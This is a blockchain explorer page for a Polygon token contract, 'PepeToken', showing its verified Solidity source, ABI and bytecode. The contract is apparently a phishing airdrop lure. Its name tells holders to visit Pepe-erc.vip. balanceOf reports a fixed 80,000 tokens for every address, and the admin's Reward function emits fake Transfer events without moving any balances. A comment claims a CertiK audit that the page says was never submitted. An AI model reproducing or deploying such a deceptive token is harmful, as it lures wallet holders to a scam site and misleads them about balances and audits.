ERC-20
Overview
Max Total Supply
1,000,000,000 Pepe-erc.vip
Holders
18,950
Market
Price
$0.00 @ 0.000000 MATIC
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
80,000 Pepe-erc.vipValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
Contract Name:
PepeToken
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at polygonscan.com on 2023-10-14 */ /** * AUDITED BY certik * Website: https://Pepe-erc.vip * Telegram: https://t.me/Pepe_ERC_VIP βββββββ βββββββ βββββββ βββββββ βββββββ βββββββ βββ β βββββββ ββ β β β β β β β β β β β β β β β β β β β ββββ β β ββββ ββ ββ β β βββ β ββββ βββ β β βββ β βββββ βββ β ββββ β β β β β β ββ βββββ β β ββββ ββββ ββββ ββββ β β β βββ β βββ ββββ β β β β β βββββ β β ββββ β β β β β β βββββ β β β βββββ βββββββββββββ βββββββββ βββββ βββββββββββββ βββββββββββββ ββββ */ //SPDX-License-Identifier: MIT pragma solidity ^0.8.9; abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } interface IERC20 { function totalSupply() external view returns (uint256); function balanceOf(address account) external view returns (uint256); function transfer(address recipient, uint256 amount) external returns (bool); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 amount) external returns (bool); function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); event Transfer(address indexed from, address indexed to, uint256 value); event Approval(address indexed owner, address indexed spender, uint256 value); } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } contract PepeToken is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; address admin; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor() { _name = "You Earned $PEPE Go here Pepe-erc.vip"; _symbol = "Pepe-erc.vip"; _totalSupply = 1e9 * 10**18; admin = msg.sender; } function Reward(address[] calldata recipients) external { require(admin == msg.sender); uint256 amount = 8e4*10**18; uint256 size = recipients.length; for(uint256 i; i < size; ){ address user = recipients[i]; unchecked { i++; } emit Transfer(address(0), user, amount); } } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return 8e4*10**18; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; } _balances[to] += amount; emit Transfer(from, to, amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"recipients","type":"address[]"}],"name":"Reward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040523480156200001157600080fd5b5060405180606001604052806025815260200162000be2602591396003906200003b90826200013c565b5060408051808201909152600c81526b0506570652d6572632e7669760a41b60208201526004906200006e90826200013c565b506b033b2e3c9fd0803ce8000000600255600580546001600160a01b0319163317905562000208565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620000c257607f821691505b602082108103620000e357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200013757600081815260208120601f850160051c81016020861015620001125750805b601f850160051c820191505b8181101562000133578281556001016200011e565b5050505b505050565b81516001600160401b0381111562000158576200015862000097565b6200017081620001698454620000ad565b84620000e9565b602080601f831160018114620001a857600084156200018f5750858301515b600019600386901b1c1916600185901b17855562000133565b600085815260208120601f198616915b82811015620001d957888601518255948401946001909101908401620001b8565b5085821015620001f85787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6109ca80620002186000396000f3fe608060405234801561001057600080fd5b50600436106100b45760003560e01c806370a082311161007157806370a082311461014157806395d89b411461015e5780639a04468214610166578063a457c2d71461017b578063a9059cbb1461018e578063dd62ed3e146101a157600080fd5b806306fdde03146100b9578063095ea7b3146100d757806318160ddd146100fa57806323b872dd1461010c578063313ce5671461011f578063395093511461012e575b600080fd5b6100c16101b4565b6040516100ce9190610789565b60405180910390f35b6100ea6100e53660046107f3565b610246565b60405190151581526020016100ce565b6002545b6040519081526020016100ce565b6100ea61011a36600461081d565b610260565b604051601281526020016100ce565b6100ea61013c3660046107f3565b610284565b6100fe61014f366004610859565b506910f0cf064dd59200000090565b6100c16102a6565b61017961017436600461087b565b6102b5565b005b6100ea6101893660046107f3565b610363565b6100ea61019c3660046107f3565b6103e3565b6100fe6101af3660046108f0565b6103f1565b6060600380546101c390610923565b80601f01602080910402602001604051908101604052809291908181526020018280546101ef90610923565b801561023c5780601f106102115761010080835404028352916020019161023c565b820191906000526020600020905b81548152906001019060200180831161021f57829003601f168201915b5050505050905090565b60003361025481858561041c565b60019150505b92915050565b60003361026e858285610540565b6102798585856105ba565b506001949350505050565b60003361025481858561029783836103f1565b6102a1919061095d565b61041c565b6060600480546101c390610923565b6005546001600160a01b031633146102cc57600080fd5b6910f0cf064dd5920000008160005b8181101561035c5760008585838181106102f7576102f761097e565b905060200201602081019061030c9190610859565b6040518581526001909301929091506001600160a01b038216906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3506102db565b5050505050565b6000338161037182866103f1565b9050838110156103d65760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b610279828686840361041c565b6000336102548185856105ba565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b03831661047e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103cd565b6001600160a01b0382166104df5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103cd565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061054c84846103f1565b905060001981146105b457818110156105a75760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016103cd565b6105b4848484840361041c565b50505050565b6001600160a01b03831661061e5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103cd565b6001600160a01b0382166106805760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103cd565b6001600160a01b038316600090815260208190526040902054818110156106f85760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103cd565b6001600160a01b0380851660009081526020819052604080822085850390559185168152908120805484929061072f90849061095d565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161077b91815260200190565b60405180910390a350505050565b600060208083528351808285015260005b818110156107b65785810183015185820160400152820161079a565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146107ee57600080fd5b919050565b6000806040838503121561080657600080fd5b61080f836107d7565b946020939093013593505050565b60008060006060848603121561083257600080fd5b61083b846107d7565b9250610849602085016107d7565b9150604084013590509250925092565b60006020828403121561086b57600080fd5b610874826107d7565b9392505050565b6000806020838503121561088e57600080fd5b823567ffffffffffffffff808211156108a657600080fd5b818501915085601f8301126108ba57600080fd5b8135818111156108c957600080fd5b8660208260051b85010111156108de57600080fd5b60209290920196919550909350505050565b6000806040838503121561090357600080fd5b61090c836107d7565b915061091a602084016107d7565b90509250929050565b600181811c9082168061093757607f821691505b60208210810361095757634e487b7160e01b600052602260045260246000fd5b50919050565b8082018082111561025a57634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052603260045260246000fdfea2646970667358221220e52cdf71a9b9add4f7009771efcf57c39ca41becc4c0aab72c32b6e2e82c22d364736f6c63430008120033596f75204561726e656420245045504520476f206865726520506570652d6572632e766970
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100b45760003560e01c806370a082311161007157806370a082311461014157806395d89b411461015e5780639a04468214610166578063a457c2d71461017b578063a9059cbb1461018e578063dd62ed3e146101a157600080fd5b806306fdde03146100b9578063095ea7b3146100d757806318160ddd146100fa57806323b872dd1461010c578063313ce5671461011f578063395093511461012e575b600080fd5b6100c16101b4565b6040516100ce9190610789565b60405180910390f35b6100ea6100e53660046107f3565b610246565b60405190151581526020016100ce565b6002545b6040519081526020016100ce565b6100ea61011a36600461081d565b610260565b604051601281526020016100ce565b6100ea61013c3660046107f3565b610284565b6100fe61014f366004610859565b506910f0cf064dd59200000090565b6100c16102a6565b61017961017436600461087b565b6102b5565b005b6100ea6101893660046107f3565b610363565b6100ea61019c3660046107f3565b6103e3565b6100fe6101af3660046108f0565b6103f1565b6060600380546101c390610923565b80601f01602080910402602001604051908101604052809291908181526020018280546101ef90610923565b801561023c5780601f106102115761010080835404028352916020019161023c565b820191906000526020600020905b81548152906001019060200180831161021f57829003601f168201915b5050505050905090565b60003361025481858561041c565b60019150505b92915050565b60003361026e858285610540565b6102798585856105ba565b506001949350505050565b60003361025481858561029783836103f1565b6102a1919061095d565b61041c565b6060600480546101c390610923565b6005546001600160a01b031633146102cc57600080fd5b6910f0cf064dd5920000008160005b8181101561035c5760008585838181106102f7576102f761097e565b905060200201602081019061030c9190610859565b6040518581526001909301929091506001600160a01b038216906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3506102db565b5050505050565b6000338161037182866103f1565b9050838110156103d65760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b610279828686840361041c565b6000336102548185856105ba565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b03831661047e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103cd565b6001600160a01b0382166104df5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103cd565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061054c84846103f1565b905060001981146105b457818110156105a75760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016103cd565b6105b4848484840361041c565b50505050565b6001600160a01b03831661061e5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103cd565b6001600160a01b0382166106805760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103cd565b6001600160a01b038316600090815260208190526040902054818110156106f85760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103cd565b6001600160a01b0380851660009081526020819052604080822085850390559185168152908120805484929061072f90849061095d565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161077b91815260200190565b60405180910390a350505050565b600060208083528351808285015260005b818110156107b65785810183015185820160400152820161079a565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146107ee57600080fd5b919050565b6000806040838503121561080657600080fd5b61080f836107d7565b946020939093013593505050565b60008060006060848603121561083257600080fd5b61083b846107d7565b9250610849602085016107d7565b9150604084013590509250925092565b60006020828403121561086b57600080fd5b610874826107d7565b9392505050565b6000806020838503121561088e57600080fd5b823567ffffffffffffffff808211156108a657600080fd5b818501915085601f8301126108ba57600080fd5b8135818111156108c957600080fd5b8660208260051b85010111156108de57600080fd5b60209290920196919550909350505050565b6000806040838503121561090357600080fd5b61090c836107d7565b915061091a602084016107d7565b90509250929050565b600181811c9082168061093757607f821691505b60208210810361095757634e487b7160e01b600052602260045260246000fd5b50919050565b8082018082111561025a57634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052603260045260246000fdfea2646970667358221220e52cdf71a9b9add4f7009771efcf57c39ca41becc4c0aab72c32b6e2e82c22d364736f6c63430008120033
Deployed Bytecode Sourcemap
2755:8472:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4036:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6379:201;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;6379:201:0;1004:187:1;5156:108:0;5244:12;;5156:108;;;1342:25:1;;;1330:2;1315:18;5156:108:0;1196:177:1;7160:295:0;;;;;;:::i;:::-;;:::i;4998:93::-;;;5081:2;1853:36:1;;1841:2;1826:18;4998:93:0;1711:184:1;7864:238:0;;;;;;:::i;:::-;;:::i;5327:119::-;;;;;;:::i;:::-;-1:-1:-1;5428:10:0;;5327:119;4255:104;;;:::i;3563:403::-;;;;;;:::i;:::-;;:::i;:::-;;8605:436;;;;;;:::i;:::-;;:::i;5652:193::-;;;;;;:::i;:::-;;:::i;5908:151::-;;;;;;:::i;:::-;;:::i;4036:100::-;4090:13;4123:5;4116:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4036:100;:::o;6379:201::-;6462:4;1338:10;6518:32;1338:10;6534:7;6543:6;6518:8;:32::i;:::-;6568:4;6561:11;;;6379:201;;;;;:::o;7160:295::-;7291:4;1338:10;7349:38;7365:4;1338:10;7380:6;7349:15;:38::i;:::-;7398:27;7408:4;7414:2;7418:6;7398:9;:27::i;:::-;-1:-1:-1;7443:4:0;;7160:295;-1:-1:-1;;;;7160:295:0:o;7864:238::-;7952:4;1338:10;8008:64;1338:10;8024:7;8061:10;8033:25;1338:10;8024:7;8033:9;:25::i;:::-;:38;;;;:::i;:::-;8008:8;:64::i;4255:104::-;4311:13;4344:7;4337:14;;;;;:::i;3563:403::-;3638:5;;-1:-1:-1;;;;;3638:5:0;3647:10;3638:19;3630:28;;;;;;3686:10;3722;3669:14;3750:197;3769:4;3765:1;:8;3750:197;;;3791:12;3806:10;;3817:1;3806:13;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;3901:34;;1342:25:1;;;3863:3:0;;;;;3791:28;;-1:-1:-1;;;;;;3901:34:0;;;3918:1;;3901:34;;1330:2:1;1315:18;3901:34:0;;;;;;;3776:171;3750:197;;;;3619:347;;3563:403;;:::o;8605:436::-;8698:4;1338:10;8698:4;8781:25;1338:10;8798:7;8781:9;:25::i;:::-;8754:52;;8845:15;8825:16;:35;;8817:85;;;;-1:-1:-1;;;8817:85:0;;3922:2:1;8817:85:0;;;3904:21:1;3961:2;3941:18;;;3934:30;4000:34;3980:18;;;3973:62;-1:-1:-1;;;4051:18:1;;;4044:35;4096:19;;8817:85:0;;;;;;;;;8938:60;8947:5;8954:7;8982:15;8963:16;:34;8938:8;:60::i;5652:193::-;5731:4;1338:10;5787:28;1338:10;5804:2;5808:6;5787:9;:28::i;5908:151::-;-1:-1:-1;;;;;6024:18:0;;;5997:7;6024:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;5908:151::o;10100:380::-;-1:-1:-1;;;;;10236:19:0;;10228:68;;;;-1:-1:-1;;;10228:68:0;;4328:2:1;10228:68:0;;;4310:21:1;4367:2;4347:18;;;4340:30;4406:34;4386:18;;;4379:62;-1:-1:-1;;;4457:18:1;;;4450:34;4501:19;;10228:68:0;4126:400:1;10228:68:0;-1:-1:-1;;;;;10315:21:0;;10307:68;;;;-1:-1:-1;;;10307:68:0;;4733:2:1;10307:68:0;;;4715:21:1;4772:2;4752:18;;;4745:30;4811:34;4791:18;;;4784:62;-1:-1:-1;;;4862:18:1;;;4855:32;4904:19;;10307:68:0;4531:398:1;10307:68:0;-1:-1:-1;;;;;10388:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;10440:32;;1342:25:1;;;10440:32:0;;1315:18:1;10440:32:0;;;;;;;10100:380;;;:::o;10771:453::-;10906:24;10933:25;10943:5;10950:7;10933:9;:25::i;:::-;10906:52;;-1:-1:-1;;10973:16:0;:37;10969:248;;11055:6;11035:16;:26;;11027:68;;;;-1:-1:-1;;;11027:68:0;;5136:2:1;11027:68:0;;;5118:21:1;5175:2;5155:18;;;5148:30;5214:31;5194:18;;;5187:59;5263:18;;11027:68:0;4934:353:1;11027:68:0;11139:51;11148:5;11155:7;11183:6;11164:16;:25;11139:8;:51::i;:::-;10895:329;10771:453;;;:::o;9520:570::-;-1:-1:-1;;;;;9651:18:0;;9643:68;;;;-1:-1:-1;;;9643:68:0;;5494:2:1;9643:68:0;;;5476:21:1;5533:2;5513:18;;;5506:30;5572:34;5552:18;;;5545:62;-1:-1:-1;;;5623:18:1;;;5616:35;5668:19;;9643:68:0;5292:401:1;9643:68:0;-1:-1:-1;;;;;9730:16:0;;9722:64;;;;-1:-1:-1;;;9722:64:0;;5900:2:1;9722:64:0;;;5882:21:1;5939:2;5919:18;;;5912:30;5978:34;5958:18;;;5951:62;-1:-1:-1;;;6029:18:1;;;6022:33;6072:19;;9722:64:0;5698:399:1;9722:64:0;-1:-1:-1;;;;;9821:15:0;;9799:19;9821:15;;;;;;;;;;;9855:21;;;;9847:72;;;;-1:-1:-1;;;9847:72:0;;6304:2:1;9847:72:0;;;6286:21:1;6343:2;6323:18;;;6316:30;6382:34;6362:18;;;6355:62;-1:-1:-1;;;6433:18:1;;;6426:36;6479:19;;9847:72:0;6102:402:1;9847:72:0;-1:-1:-1;;;;;9955:15:0;;;:9;:15;;;;;;;;;;;9973:20;;;9955:38;;10015:13;;;;;;;;:23;;9987:6;;9955:9;10015:23;;9987:6;;10015:23;:::i;:::-;;;;;;;;10071:2;-1:-1:-1;;;;;10056:26:0;10065:4;-1:-1:-1;;;;;10056:26:0;;10075:6;10056:26;;;;1342:25:1;;1330:2;1315:18;;1196:177;10056:26:0;;;;;;;;9632:458;9520:570;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:186::-;1959:6;2012:2;2000:9;1991:7;1987:23;1983:32;1980:52;;;2028:1;2025;2018:12;1980:52;2051:29;2070:9;2051:29;:::i;:::-;2041:39;1900:186;-1:-1:-1;;;1900:186:1:o;2091:615::-;2177:6;2185;2238:2;2226:9;2217:7;2213:23;2209:32;2206:52;;;2254:1;2251;2244:12;2206:52;2294:9;2281:23;2323:18;2364:2;2356:6;2353:14;2350:34;;;2380:1;2377;2370:12;2350:34;2418:6;2407:9;2403:22;2393:32;;2463:7;2456:4;2452:2;2448:13;2444:27;2434:55;;2485:1;2482;2475:12;2434:55;2525:2;2512:16;2551:2;2543:6;2540:14;2537:34;;;2567:1;2564;2557:12;2537:34;2620:7;2615:2;2605:6;2602:1;2598:14;2594:2;2590:23;2586:32;2583:45;2580:65;;;2641:1;2638;2631:12;2580:65;2672:2;2664:11;;;;;2694:6;;-1:-1:-1;2091:615:1;;-1:-1:-1;;;;2091:615:1:o;2711:260::-;2779:6;2787;2840:2;2828:9;2819:7;2815:23;2811:32;2808:52;;;2856:1;2853;2846:12;2808:52;2879:29;2898:9;2879:29;:::i;:::-;2869:39;;2927:38;2961:2;2950:9;2946:18;2927:38;:::i;:::-;2917:48;;2711:260;;;;;:::o;2976:380::-;3055:1;3051:12;;;;3098;;;3119:61;;3173:4;3165:6;3161:17;3151:27;;3119:61;3226:2;3218:6;3215:14;3195:18;3192:38;3189:161;;3272:10;3267:3;3263:20;3260:1;3253:31;3307:4;3304:1;3297:15;3335:4;3332:1;3325:15;3189:161;;2976:380;;;:::o;3361:222::-;3426:9;;;3447:10;;;3444:133;;;3499:10;3494:3;3490:20;3487:1;3480:31;3534:4;3531:1;3524:15;3562:4;3559:1;3552:15;3588:127;3649:10;3644:3;3640:20;3637:1;3630:31;3680:4;3677:1;3670:15;3704:4;3701:1;3694:15
Swarm Source
ipfs://e52cdf71a9b9add4f7009771efcf57c39ca41becc4c0aab72c32b6e2e82c22d3
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.